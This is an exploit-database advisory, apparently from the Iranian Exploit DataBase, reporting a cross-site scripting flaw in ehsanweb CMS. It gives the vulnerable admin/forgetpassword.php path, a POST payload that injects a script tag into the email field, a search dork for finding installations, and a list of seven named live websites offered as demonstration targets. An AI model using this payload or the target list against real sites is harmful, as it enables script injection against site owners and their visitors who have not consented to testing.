Cross-Site Scripting Vulnerability in ehsanweb CMS -- *** Iranian Exploit DataBase *** * ** http://iedb.ir <http://exploit.iedb.ir> *** ################################# # # @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@ # @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ # @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@ # @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@ # @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@ # ##################################### ##################################### # Iranian Exploit DataBase # ehsanweb CMS Cross-Site Scripting Vulnerability # Vendor site : http://www.ehsanweb.com # Dork : "????? ? ?????? ?????: ????? ??" # Author : IeDb # Site : Www.IeDb.Ir/acc - Www.IrIsT.Ir # Fb Page : https://www.facebook.com/iedb.ir ##################################### Bug : http://www.site.com/admin/forgetpassword.php POST : email="><script>alert(/amir/)</script> Image : http://upload.tehran98.com/upme/uploads/1ed2e1296fe441df1.jpg Dem0 : http://www.ehsanweb.com/admin/forgetpassword.php?process http://pgshco.com/admin/forgetpassword.php?process http://www.sapno.ir/admin/forgetpassword.php?process http://abzarmajid.com/admin/forgetpassword.php?process http://www.danavc.com/admin/forgetpassword.php?process http://lotuscard.ir/admin/forgetpassword.php?process http://www.asregorgan.ir/admin/forgetpassword.php?process ##################################### # Greats : Bl4ck M4n - ErfanMs - 4ntr4x - N20 - Bl4ck N3T - dr.koderz - Enddo - E1.Coders - Behnam Vanda # E2MA3N - l4tr0d3ctism - H-SK33PY - sole sad - r3d_s0urc3 - Dr_Evil - z3r0 - 0x0ptim0us - 0Day # Security - ARTA - ARYABOD - Mr.Time - C0dex - Det3cT0r - yashar shahinzadeh - Khashayar # tootro20 - AmirMasoud And All Members In IeDb.Ir/acc ##################################### # Archive Exploit = http://www.iedb.ir/exploits-1903.html #####################################